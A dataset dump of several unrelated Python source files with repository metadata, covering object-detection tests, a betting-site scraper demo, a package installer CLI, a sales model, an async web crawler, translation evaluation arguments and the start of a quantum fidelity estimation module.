027decf72bf9d96de3b4de13dcac7b352b07fd63
|
[
"Apache-2.0"
] | null | null | null |
mlx/od/archive/ssd/test_utils.py
|
lewfish/mlx
|
027decf72bf9d96de3b4de13dcac7b352b07fd63
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import torch
from torch.nn.functional import binary_cross_entropy as bce, l1_loss
from mlx.od.ssd.utils import (
ObjectDetectionGrid, BoxList, compute_intersection, compute_iou, F1)
class TestIOU(unittest.TestCase):
    """Tests for pairwise box intersection and IOU computation."""

    def test_compute_intersection(self):
        boxes_a = torch.tensor(
            [[0, 0, 2, 2], [1, 1, 3, 3], [2, 2, 4, 4]], dtype=torch.float)
        boxes_b = torch.tensor(
            [[0, 0, 2, 2], [1, 1, 3, 3]], dtype=torch.float)
        expected = torch.tensor(
            [[4, 1], [1, 4], [0, 1]], dtype=torch.float)
        self.assertTrue(compute_intersection(boxes_a, boxes_b).equal(expected))

    def test_compute_iou(self):
        boxes_a = torch.tensor(
            [[0, 0, 2, 2], [1, 1, 3, 3], [2, 2, 4, 4]], dtype=torch.float)
        boxes_b = torch.tensor(
            [[0, 0, 2, 2], [1, 1, 3, 3]], dtype=torch.float)
        expected = torch.tensor(
            [[1, 1./7], [1./7, 1], [0, 1./7]], dtype=torch.float)
        self.assertTrue(compute_iou(boxes_a, boxes_b).equal(expected))
class TestBoxList(unittest.TestCase):
    """Tests for BoxList score filtering and non-maximum suppression."""

    def test_score_filter(self):
        box_list = BoxList(
            torch.tensor([[0, 0, 2, 2], [1, 1, 3, 3]], dtype=torch.float),
            torch.tensor([0, 1]),
            torch.tensor([0.3, 0.7]))
        expected = BoxList(
            torch.tensor([[1, 1, 3, 3]], dtype=torch.float),
            torch.tensor([1]),
            torch.tensor([0.7]))
        self.assertTrue(box_list.score_filter(0.5).equal(expected))

    def test_nms(self):
        input_boxes = torch.tensor(
            [[0, 0, 10, 10],
             [1, 1, 11, 11],
             [9, 9, 19, 19],
             [0, 0, 10, 10],
             [20, 20, 21, 21]], dtype=torch.float)
        input_labels = torch.tensor([0, 0, 0, 1, 1])
        input_scores = torch.tensor([0.5, 0.7, 0.5, 0.5, 0.5])
        suppressed = BoxList(input_boxes, input_labels, input_scores).nms(0.5)
        expected = BoxList(
            torch.tensor(
                [[1, 1, 11, 11],
                 [9, 9, 19, 19],
                 [0, 0, 10, 10],
                 [20, 20, 21, 21]], dtype=torch.float),
            torch.tensor([0, 0, 1, 1]),
            torch.tensor([0.7, 0.5, 0.5, 0.5]))
        self.assertTrue(suppressed.equal(expected))
class TestDetectorGrid(unittest.TestCase):
    """Tests for ObjectDetectionGrid encode/decode and loss computation."""

    def setUp(self):
        # 2x2 grid, two anchor sizes, two classes.
        grid_sz = 2
        anc_sizes = torch.tensor([
            [2, 0.5],
            [0.5, 2]])
        num_classes = 2
        self.grid = ObjectDetectionGrid(grid_sz, anc_sizes, num_classes)

    def test_decode(self):
        batch_sz = 1
        out = torch.zeros(self.grid.get_out_shape(batch_sz), dtype=torch.float)
        # y_offset, x_offset, y_scale, x_scale, c0, c1
        out[0, 1, :, 0, 0] = torch.tensor([0.5, 0, 1, 1, 0.1, 0.7])
        exp_boxes = torch.tensor([-0.25, -1.5, 0.25, 0.5])
        exp_labels = torch.ones((1, 8), dtype=torch.long)
        exp_labels[0, 1] = torch.tensor(1)
        exp_scores = torch.zeros((1, 8))
        exp_scores[0, 1] = torch.tensor(0.7)
        boxes, labels, scores = self.grid.decode(out)
        self.assertTrue(boxes[0, 1, :].equal(exp_boxes))
        self.assertTrue(labels.equal(exp_labels))
        self.assertTrue(scores.equal(exp_scores))

    def test_encode(self):
        exp_out = torch.zeros(self.grid.get_out_shape(1), dtype=torch.float)
        # y_offset, x_offset, y_scale, x_scale, c0, c1
        exp_out[0, 1, :, 0, 1] = torch.tensor([0, 0, 1, 0.5, 0, 1])
        boxes = torch.tensor([[[-0.75, 0, -0.25, 1]]])
        labels = torch.tensor([[1]])
        out = self.grid.encode(boxes, labels)
        self.assertTrue(out.equal(exp_out))

    def test_get_preds(self):
        # Round-trip: encoding then extracting predictions recovers the input.
        grid_sz = 2
        anc_sizes = torch.tensor([
            [1., 1],
            [2, 2]])
        num_classes = 2
        grid = ObjectDetectionGrid(grid_sz, anc_sizes, num_classes)
        boxes = torch.tensor([[[0, 0, 0.5, 0.5]]])
        labels = torch.tensor([[1]])
        output = grid.encode(boxes, labels)
        b, l, s = grid.get_preds(output)
        self.assertTrue(b.equal(boxes))
        self.assertTrue(l.equal(labels))

    def test_compute_losses(self):
        # Encode a ground truth and a deliberately offset prediction.
        boxes = torch.tensor([[[-0.75, 0, -0.25, 1]]])
        labels = torch.tensor([[1]])
        gt = self.grid.encode(boxes, labels)
        boxes = torch.tensor([[[-1., 0, 0, 1]]])
        labels = torch.tensor([[0]])
        out = self.grid.encode(boxes, labels)
        bl, cl = self.grid.compute_losses(out, gt)
        bl, cl = bl.item(), cl.item()
        # Box loss should equal the L1 distance between the two encodings.
        exp_bl = l1_loss(torch.tensor([0, 0, 1, 0.5]),
                         torch.tensor([0, 0, 2, 0.5])).item()
        self.assertEqual(bl, exp_bl)
        num_class_els = 16
        # Class loss: two maximally-wrong logits averaged over all elements.
        exp_cl = ((2 * bce(torch.tensor(1.), torch.tensor(0.))).item() /
                  num_class_els)
        self.assertEqual(cl, exp_cl)
class TestF1(unittest.TestCase):
    """Tests for the F1 metric over grid-encoded detections."""

    def setUp(self):
        grid_sz = 2
        anc_sizes = torch.tensor([
            [1., 1],
            [2, 2]])
        num_classes = 3
        self.grid = ObjectDetectionGrid(grid_sz, anc_sizes, num_classes)
        self.f1 = F1(self.grid, score_thresh=0.3, iou_thresh=0.5)
        self.f1.on_epoch_begin()

    def test1(self):
        # Two images in each batch. Each image has:
        # Two boxes, both match.
        boxes = torch.tensor([
            [[0, 0, 0.5, 0.5], [-1, -1, -0.5, -0.5]],
            [[0, 0, 0.5, 0.5], [-1, -1, -0.5, -0.5]]
        ])
        labels = torch.tensor([[1, 1], [1, 1]])
        output = self.grid.encode(boxes, labels)
        target_boxes = torch.tensor([
            [[0, 0, 0.5, 0.5], [-1, -1, -0.5, -0.5]],
            [[0, 0, 0.5, 0.5], [-1, -1, -0.5, -0.5]]
        ])
        target_labels = torch.tensor([[1, 1], [1, 1]])
        target = (target_boxes, target_labels)
        # Simulate two batches
        self.f1.on_batch_end(output, target)
        self.f1.on_batch_end(output, target)
        metrics = self.f1.on_epoch_end({})
        # 8 true positives, no false positives/negatives -> perfect score.
        exp_f1 = self.f1.compute_f1(8, 0, 0)
        self.assertEqual(exp_f1, 1.0)
        self.assertEqual(exp_f1, metrics['last_metrics'][0])

    def test2(self):
        # Two boxes, one matches, the other doesn't overlap enough.
        boxes = torch.tensor([
            [[0, 0, 0.5, 0.5], [-1, -1, -0.5, -0.5]]
        ])
        labels = torch.tensor([[1, 1]])
        output = self.grid.encode(boxes, labels)
        target_boxes = torch.tensor([
            [[0, 0, 0.1, 0.1], [-1, -1, -0.5, -0.5]],
        ])
        target_labels = torch.tensor([[1, 1]])
        target = (target_boxes, target_labels)
        self.f1.on_batch_end(output, target)
        metrics = self.f1.on_epoch_end({})
        # 1 TP, 1 FP, 1 FN -> F1 of 0.5.
        exp_f1 = self.f1.compute_f1(1, 1, 1)
        self.assertEqual(exp_f1, 0.5)
        self.assertEqual(exp_f1, metrics['last_metrics'][0])

    def test3(self):
        # Three boxes, one matches, one overlaps but has the wrong label,
        # and one doesn't match.
        boxes = torch.tensor([
            [[0, 0, 0.5, 0.5], [-1, -1, -0.5, -0.5], [-0.5, 0, 0, 0.5]]
        ])
        labels = torch.tensor([[1, 2, 1]])
        output = self.grid.encode(boxes, labels)
        target_boxes = torch.tensor([
            [[0, 0, 0.5, 0.5], [-1, -1, -0.5, -0.5], [-0.5, 0, -0.4, 0.1]]
        ])
        target_labels = torch.tensor([[1, 1, 1]])
        target = (target_boxes, target_labels)
        self.f1.on_batch_end(output, target)
        metrics = self.f1.on_epoch_end({})
        # 1 TP, 2 FP, 2 FN.
        exp_f1 = self.f1.compute_f1(1, 2, 2)
        self.assertEqual(exp_f1, metrics['last_metrics'][0])
if __name__ == '__main__':
    # Run all test cases in this module.
    unittest.main()
| 36.322727
| 79
| 0.511325
| 1,142
| 7,991
| 3.452715
| 0.119089
| 0.026883
| 0.091301
| 0.023332
| 0.611463
| 0.552118
| 0.501648
| 0.46665
| 0.411362
| 0.33477
| 0
| 0.084946
| 0.320861
| 7,991
| 220
| 80
| 36.322727
| 0.641607
| 0.040045
| 0
| 0.441341
| 0
| 0
| 0.005742
| 0
| 0
| 0
| 0
| 0
| 0.094972
| 1
| 0.072626
| false
| 0
| 0.022346
| 0
| 0.117318
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c956809dc40104300810383514543a84d7e16eb4
| 3,284
|
py
|
Python
|
src/utilsmodule/main.py
|
jke94/WilliamHill-WebScraping
|
d570ff7ba8a5c35d7c852327910d39b715ce5125
|
[
"MIT"
] | null | null | null |
src/utilsmodule/main.py
|
jke94/WilliamHill-WebScraping
|
d570ff7ba8a5c35d7c852327910d39b715ce5125
|
[
"MIT"
] | 1
|
2020-10-13T15:44:40.000Z
|
2020-10-13T15:44:40.000Z
|
src/utilsmodule/main.py
|
jke94/WilliamHill-WebScraping
|
d570ff7ba8a5c35d7c852327910d39b715ce5125
|
[
"MIT"
] | null | null | null |
'''
AUTHOR: Javier Carracedo
Date: 08/10/2020
Auxiliar class to test methods from WilliamHillURLs.py
'''
import WilliamHillURLs
if __name__ == "__main__":
myVariable = WilliamHillURLs.WilliamHillURLs()
# Print all matches played actually.
for item in myVariable.GetAllMatchsPlayedActually(myVariable.URL_FootballOnDirect):
print(item)
'''
OUTPUT EXAMPLE at 08/10/2020 20:19:29:
Islas Feroe Sub 21 v España Sub 21: 90/1 | 15/2 | 1/40
Dornbirn v St Gallen: 90/1 | 15/2 | 1/40
Corellano v Peña Azagresa: 90/1 | 15/2 | 1/40
Esbjerg v Silkeborg: 90/1 | 15/2 | 1/40
Koge Nord v Ishoj: 90/1 | 15/2 | 1/40
Vasco da Gama Sub 20 v Bangu Sub 20: 90/1 | 15/2 | 1/40
Rangers de Talca v Dep. Valdivia: 90/1 | 15/2 | 1/40
San Marcos v Dep. Santa Cruz: 90/1 | 15/2 | 1/40
Melipilla v Puerto Montt: 90/1 | 15/2 | 1/40
Kray v TuRU Dusseldorf: 90/1 | 15/2 | 1/40
Siegen v Meinerzhagen: 90/1 | 15/2 | 1/40
1. FC M'gladbach v Kleve: 90/1 | 15/2 | 1/40
Waldgirmes v Turkgucu-Friedberg: 90/1 | 15/2 | 1/40
Zamalek v Wadi Degla: 90/1 | 15/2 | 1/40
Elva v Flora B: 90/1 | 15/2 | 1/40
Fujairah FC v Ajman: 90/1 | 15/2 | 1/40
Vanersborg v Ahlafors: 90/1 | 15/2 | 1/40
'''
# Print all URL mathes played actually.
for item in myVariable.GetAllUrlMatches(myVariable.URL_FootballOnDirect):
print(item)
'''OUTPUT EXAMPLE at 08/10/2020 20:19:29:
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18701125/islas-feroe-sub-21-â-españa-sub-21
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18701988/dornbirn-â-st-gallen
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18702077/corellano-â-peña-azagresa
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694620/esbjerg-â-silkeborg
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18702062/koge-nord-â-ishoj
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18701883/vasco-da-gama-sub-20-â-bangu-sub-20
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694610/rangers-de-talca-â-dep-valdivia
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694611/san-marcos-â-dep-santa-cruz
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694612/melipilla-â-puerto-montt
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694624/kray-â-turu-dusseldorf
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694625/siegen-â-meinerzhagen
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694626/1-fc-mgladbach-â-kleve
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694627/waldgirmes-â-turkgucu-friedberg
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694162/zamalek-â-wadi-degla
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18701762/elva-â-flora-b
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18701661/fujairah-fc-â-ajman
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18701852/vanersborg-â-ahlafors
'''
| 49.014925
| 109
| 0.670524
| 511
| 3,284
| 4.264188
| 0.248532
| 0.023405
| 0.039009
| 0.04681
| 0.530978
| 0.505278
| 0.404773
| 0.404773
| 0.404773
| 0.061496
| 0
| 0.130816
| 0.201583
| 3,284
| 66
| 110
| 49.757576
| 0.698703
| 0.052071
| 0
| 0.285714
| 0
| 0
| 0.023669
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0.285714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9570eba69366671540e993ccc63b21a8b23a785
| 3,185
|
py
|
Python
|
mys/cli/subparsers/install.py
|
nsauzede/mys
|
5f5db80b25e44e3ab9c4b97cb9a0fd6fa3fc0267
|
[
"MIT"
] | null | null | null |
mys/cli/subparsers/install.py
|
nsauzede/mys
|
5f5db80b25e44e3ab9c4b97cb9a0fd6fa3fc0267
|
[
"MIT"
] | null | null | null |
mys/cli/subparsers/install.py
|
nsauzede/mys
|
5f5db80b25e44e3ab9c4b97cb9a0fd6fa3fc0267
|
[
"MIT"
] | null | null | null |
import glob
import os
import shutil
import sys
import tarfile
from tempfile import TemporaryDirectory
from ..utils import ERROR
from ..utils import Spinner
from ..utils import add_jobs_argument
from ..utils import add_no_ccache_argument
from ..utils import add_verbose_argument
from ..utils import box_print
from ..utils import build_app
from ..utils import build_prepare
from ..utils import read_package_configuration
from ..utils import run
def install_clean():
    """Remove the build directory of the package in the current directory.

    Raises:
        Exception: if the current directory is not a mys package
        (no package.toml manifest).
    """
    # A package is identified by its package.toml manifest.
    manifest = 'package.toml'

    if not os.path.exists(manifest):
        raise Exception('not a package')

    with Spinner(text='Cleaning'):
        shutil.rmtree('build', ignore_errors=True)
def install_download(args):
    """Download the package `mys-<args.package>` from the registry with pip."""
    # Invoke pip through the same interpreter that runs this CLI.
    run([sys.executable, '-m', 'pip', 'download', f'mys-{args.package}'],
        'Downloading package',
        args.verbose)
def install_extract():
    """Unpack the downloaded mys-*.tar.gz archive, then delete the archive."""
    tarball = glob.glob('mys-*.tar.gz')[0]

    # NOTE(review): extractall() trusts member paths inside the archive;
    # packages come from the registry, but confirm that is acceptable.
    with Spinner(text='Extracting package'), tarfile.open(tarball) as fin:
        fin.extractall()

    os.remove(tarball)
def install_build(args):
    """Build the application in the current package.

    Returns the parsed package configuration.

    Raises:
        Exception: if the package does not contain an application
        (no src/main.mys).
    """
    config = read_package_configuration()
    is_application = build_prepare(args.verbose, 'speed', args.no_ccache, config)

    if is_application:
        build_app(args.debug, args.verbose, args.jobs, is_application)

        return config

    # Only packages shipping an application can be installed.
    box_print(
        ['There is no application to build in this package (src/main.mys ',
         'missing).'],
        ERROR)

    raise Exception()
def install_install(root, _args, config):
    """Copy the freshly built application binary into <root>/bin.

    The installed executable is named after the package.
    """
    bin_dir = os.path.join(root, 'bin')
    bin_name = config['package']['name']
    installed = os.path.join(bin_dir, bin_name)

    with Spinner(text=f"Installing {bin_name} in {bin_dir}"):
        os.makedirs(bin_dir, exist_ok=True)
        # Copy the file contents first, then replicate its permission bits.
        shutil.copyfile('build/app', installed)
        shutil.copymode('build/app', installed)
def install_from_current_dirctory(args, root):
    """Build the package in the current directory and install it under root.

    NOTE(review): 'dirctory' is a typo for 'directory', but renaming would
    also require changing the caller, so the name is kept.
    """
    install_clean()
    install_install(root, args, install_build(args))
def install_from_registry(args, root):
    """Download a package from the registry, build it, and install under root.

    All work happens inside a temporary directory that is removed afterwards.
    """
    with TemporaryDirectory() as tmp_dir:
        os.chdir(tmp_dir)
        install_download(args)
        install_extract()
        # The archive extracts into a single mys-<name>-<version> directory.
        os.chdir(glob.glob('mys-*')[0])
        install_install(root, args, install_build(args))
def do_install(_parser, args, _mys_config):
    """Entry point of the install subcommand."""
    # Expand ~ and normalize the installation root up front.
    root = os.path.abspath(os.path.expanduser(args.root))

    if args.package is not None:
        install_from_registry(args, root)
    else:
        # No package given: install the package in the current directory.
        install_from_current_dirctory(args, root)
def add_subparser(subparsers):
    """Register the 'install' subcommand on the given argparse subparsers."""
    subparser = subparsers.add_parser(
        'install',
        description='Install an application from local package or registry.')
    add_verbose_argument(subparser)
    add_jobs_argument(subparser)
    add_no_ccache_argument(subparser)
    subparser.add_argument(
        '--root',
        default='~/.local',
        # Bug fix: the help text was missing the closing parenthesis after
        # the default value.
        help='Root folder to install into (default: %(default)s).')
    subparser.add_argument(
        'package',
        nargs='?',
        help=('Package to install application from. Installs current package if '
              'not given.'))
    subparser.set_defaults(func=do_install)
| 28.4375
| 85
| 0.674725
| 405
| 3,185
| 5.11358
| 0.293827
| 0.043457
| 0.072429
| 0.026074
| 0.14872
| 0.084017
| 0.051183
| 0.051183
| 0.051183
| 0.051183
| 0
| 0.000802
| 0.216954
| 3,185
| 111
| 86
| 28.693694
| 0.829591
| 0
| 0
| 0.047059
| 0
| 0
| 0.145997
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105882
| false
| 0
| 0.188235
| 0
| 0.305882
| 0.023529
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c957b9e1d84b2cf858f2f0ed59b9eda407c2dff9
| 1,011
|
py
|
Python
|
app/api/v2/models/sale.py
|
kwanj-k/storemanager-v2
|
89e9573543e32de2e8503dc1440b4ad907bb10b5
|
[
"MIT"
] | 1
|
2020-02-29T20:14:32.000Z
|
2020-02-29T20:14:32.000Z
|
app/api/v2/models/sale.py
|
kwanj-k/storemanager-v2
|
89e9573543e32de2e8503dc1440b4ad907bb10b5
|
[
"MIT"
] | 5
|
2018-10-24T17:28:48.000Z
|
2019-10-22T11:09:19.000Z
|
app/api/v2/models/sale.py
|
kwanj-k/storemanager-v2
|
89e9573543e32de2e8503dc1440b4ad907bb10b5
|
[
"MIT"
] | null | null | null |
"""
A model class for Sale
"""
# local imports
from app.api.common.utils import dt
from app.api.v2.db_config import conn
from app.api.v2.models.cart import Cart
# Module-level cursor shared by all model instances for database operations.
cur = conn.cursor()
class Sale(Cart):
    """
    Sale object which inherits some of its attributes from Cart.

    Adds the store the sale belongs to and a creation timestamp on top of
    the Cart attributes (seller_id, product, number, amount).
    """

    def __init__(self, store_id, seller_id, product, number, amount):
        super().__init__(
            seller_id=seller_id,
            product=product,
            number=number,
            amount=amount)
        self.store_id = store_id
        # dt is the shared timestamp helper from app.api.common.utils.
        self.created_at = dt

    def sell(self):
        """
        Persist this sale in the sales table.

        Bug fix: the original built the statement with Python %-string
        interpolation, which breaks on values containing quotes and is an
        SQL injection vector. The query is now parameterized so the driver
        escapes the values.
        """
        query = ("INSERT INTO "
                 "sales (store_id, seller_id, product, number, amount, created_at) "
                 "VALUES (%s, %s, %s, %s, %s, %s)")
        cur.execute(query, (self.store_id, self.seller_id, self.product,
                            self.number, self.amount, self.created_at))
        conn.commit()
| 25.275
| 106
| 0.578635
| 129
| 1,011
| 4.364341
| 0.434109
| 0.062167
| 0.021314
| 0.090586
| 0.131439
| 0.120782
| 0.120782
| 0
| 0
| 0
| 0
| 0.002821
| 0.298714
| 1,011
| 39
| 107
| 25.923077
| 0.791255
| 0.153314
| 0
| 0
| 0
| 0
| 0.197775
| 0.103832
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.142857
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9582e0280978de265a7060549f58e588eceb72b
| 3,306
|
py
|
Python
|
src/dembones/collector.py
|
TransactCharlie/dembones
|
b5540a89d4c6d535b589a1a2b06697569879bc05
|
[
"MIT"
] | null | null | null |
src/dembones/collector.py
|
TransactCharlie/dembones
|
b5540a89d4c6d535b589a1a2b06697569879bc05
|
[
"MIT"
] | null | null | null |
src/dembones/collector.py
|
TransactCharlie/dembones
|
b5540a89d4c6d535b589a1a2b06697569879bc05
|
[
"MIT"
] | null | null | null |
import aiohttp
from bs4 import BeautifulSoup
import asyncio
from dembones.webpage import WebPage
import dembones.urltools as ut
import logging
log = logging.getLogger(__name__)
class Collector:
    """Asynchronously crawl pages starting from a URL and collect WebPages.

    Bug fix: `url_hash` used to be a *class* attribute, so every Collector
    instance (and every successive collection) shared and accumulated a single
    cache. It is now per-instance state, initialized in __init__, matching how
    the rest of the class accesses it (always through `self.url_hash`).
    """

    def __init__(self, max_concurrent_fetches=3, max_depth=3, fetch_timeout=5,
                 target_validator=ut.validate_same_domain_up_path):
        # Per-instance cache of url -> WebPage (None while a fetch is pending).
        self.url_hash = {}
        # Bounds the number of simultaneous HTTP fetches.
        self.semaphore = asyncio.Semaphore(max_concurrent_fetches)
        self.fetch_timeout = fetch_timeout
        self.max_depth = max_depth
        # Predicate deciding whether a discovered link should be followed.
        self.validate_targets = target_validator

    async def fetch(self, url, session):
        """Fetch url using session and return the raw response body."""
        async with session.get(url, timeout=self.fetch_timeout) as r:
            r = await r.read()
            log.debug(r)
            return r

    async def recurse_collect(self, url, session, depth):
        """Fetch url and Soup it. Then work out which links we need to recurse."""
        # Because we are scheduled at the mercy of the reactor loop, it's possible
        # some other task is already fetching this page and awaiting the result.
        if url in self.url_hash:
            return

        # We are the only active task for this url on this reactor. Before we
        # await the page, let other potential tasks know we are working on it.
        self.url_hash[url] = None

        try:
            # Hold the semaphore only while the network fetch is in flight so
            # recursive gathers below cannot starve the permit pool.
            async with self.semaphore:
                page = await self.fetch(url, session)

            log.info("Collected: Depth {}: Url {}".format(depth, url))
            wp = WebPage.from_soup(BeautifulSoup(page, "html.parser"), url)
            self.url_hash[url] = wp

            # If we haven't hit max_depth yet, work out which links to recurse over.
            if depth < self.max_depth:
                # Strip fragment identifiers so '#section' variants deduplicate.
                stripped_targets = (ut.strip_fragment_identifier(t) for t in wp.links)

                # Build a set of target urls that obey our restrictions.
                valid_targets = {
                    st for st in stripped_targets
                    if st not in self.url_hash and self.validate_targets(url, st)
                }

                # Generate async tasks for the next depth level.
                tasks = [self.recurse_collect(vt, session, depth + 1)
                         for vt in valid_targets]

                return await asyncio.gather(*tasks)

        # There are a myriad of IO based exceptions that can happen - we don't
        # know all of them, and we want to continue processing other tasks.
        except Exception as e:
            log.error(e)
            # Upgrade our sentinel entry in the hashmap to at least be a WebPage.
            self.url_hash[url] = WebPage()

    async def start_recursive_collect(self, url, loop):
        """Start our collection using the event loop (loop)."""
        depth = 1

        async with aiohttp.ClientSession(loop=loop) as session:
            await self.recurse_collect(url, session, depth)

    def start_collection(self, url):
        """Crawl from url and return a dict mapping each url to its page dict."""
        loop = asyncio.get_event_loop()
        log.debug("Collector Event Loop Start")
        loop.run_until_complete(self.start_recursive_collect(url, loop))
        log.debug("Collector Event Loop Exit")
        return {url: wp.to_dict() for url, wp in self.url_hash.items()}
| 38.894118
| 95
| 0.629462
| 445
| 3,306
| 4.550562
| 0.382022
| 0.034568
| 0.032593
| 0.019259
| 0.02963
| 0.02963
| 0
| 0
| 0
| 0
| 0
| 0.002583
| 0.297338
| 3,306
| 84
| 96
| 39.357143
| 0.869135
| 0.209316
| 0
| 0
| 0
| 0
| 0.036416
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.115385
| 0
| 0.269231
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c959a09cafe37155453fcdb077c647271d246317
| 710
|
py
|
Python
|
translation/eval_args.py
|
AkshatSh/BinarizedNMT
|
7fa15149fdfcad6b1fd0956157c3730f3dcd781f
|
[
"MIT"
] | 10
|
2019-01-19T08:15:05.000Z
|
2021-12-02T08:54:50.000Z
|
translation/eval_args.py
|
AkshatSh/BinarizedNMT
|
7fa15149fdfcad6b1fd0956157c3730f3dcd781f
|
[
"MIT"
] | null | null | null |
translation/eval_args.py
|
AkshatSh/BinarizedNMT
|
7fa15149fdfcad6b1fd0956157c3730f3dcd781f
|
[
"MIT"
] | 2
|
2019-01-25T21:19:49.000Z
|
2019-03-21T11:38:13.000Z
|
import argparse
import train_args
def get_arg_parser() -> argparse.ArgumentParser:
    '''
    Extend the training argument parser with the evaluation-only options.
    '''
    parser = train_args.get_arg_parser()

    # (flag, add_argument keyword arguments) for each evaluation option.
    eval_options = [
        ('--load_path', dict(type=str, help='the path of the model to test')),
        ('--eval_train', dict(action='store_true', help='eval on the train set')),
        ('--eval_test', dict(action='store_true', help='eval on the test set')),
        ('--eval_fast', dict(action='store_true',
                             help='eval quickly if implemented and supported (Greedy)')),
        ('--output_file', dict(type=str, default=None,
                               help='if specified will store the translations in this file')),
    ]

    for flag, kwargs in eval_options:
        parser.add_argument(flag, **kwargs)

    return parser
| 50.714286
| 126
| 0.723944
| 103
| 710
| 4.805825
| 0.466019
| 0.090909
| 0.171717
| 0.127273
| 0.256566
| 0.113131
| 0.113131
| 0
| 0
| 0
| 0
| 0
| 0.147887
| 710
| 14
| 127
| 50.714286
| 0.818182
| 0.047887
| 0
| 0
| 0
| 0
| 0.394856
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.2
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c959fbbb426057adb9170ca9df4b29dd550126f4
| 43,792
|
py
|
Python
|
src/fidelity_estimation_pauli_sampling.py
|
akshayseshadri/minimax-fidelity-estimation
|
07ff539dc5ea8280bc4f33444da3d6a90c606833
|
[
"MIT"
] | 1
|
2021-12-16T14:23:46.000Z
|
2021-12-16T14:23:46.000Z
|
src/fidelity_estimation_pauli_sampling.py
|
akshayseshadri/minimax-fidelity-estimation
|
07ff539dc5ea8280bc4f33444da3d6a90c606833
|
[
"MIT"
] | null | null | null |
src/fidelity_estimation_pauli_sampling.py
|
akshayseshadri/minimax-fidelity-estimation
|
07ff539dc5ea8280bc4f33444da3d6a90c606833
|
[
"MIT"
] | null | null | null |
"""
Creates a fidelity estimator for any pure state, using randomized Pauli measurement strategy.
Author: Akshay Seshadri
"""
import warnings
import numpy as np
import scipy as sp
from scipy import optimize
import project_root # noqa
from src.optimization.proximal_gradient import minimize_proximal_gradient_nesterov
from src.utilities.qi_utilities import generate_random_state, generate_special_state, generate_Pauli_operator, generate_POVM, embed_hermitian_matrix_real_vector_space
from src.utilities.noise_process import depolarizing_channel
from src.utilities.quantum_measurements import Measurement_Manager
from src.fidelity_estimation import Fidelity_Estimation_Manager
def project_on_box(v, l, u):
    r"""
    Componentwise projection of v \in R^n onto the box {x | l <= x <= u}.

    Each component is clamped to its interval: values below l_k are raised
    to l_k, values above u_k are lowered to u_k, and the rest pass through,
    i.e. \Pi(v)_k = min(max(v_k, l_k), u_k).
    The bounds l_k and u_k may be -\infty and \infty respectively.
    """
    # np.clip applies the max-with-l then min-with-u clamp in one call.
    return np.clip(v, l, u)
class Pauli_Sampler_Fidelity_Estimation_Manager():
    """
    Computes the Juditsky & Nemirovski estimator and risk for pure target states when measurements
    are performed as per the randomized Pauli measurement strategy described in Box II.1 of PRA submission.

    In general, this involves finding a saddle point of the function
        \Phi_r(sigma_1, sigma_2; phi, alpha) = Tr(rho sigma_1) - Tr(rho sigma_2)
                                                + \sum_{i = 1}^N alpha R_i log(\sum_{k = 1}^{N_i} exp(-phi^{i}_k/alpha) (p^{i}_1)_k)
                                                + \sum_{i = 1}^N alpha R_i log(\sum_{k = 1}^{N_i} exp(phi^{i}_k/alpha) (p^{i}_2)_k)
                                                + 2 alpha r
    where
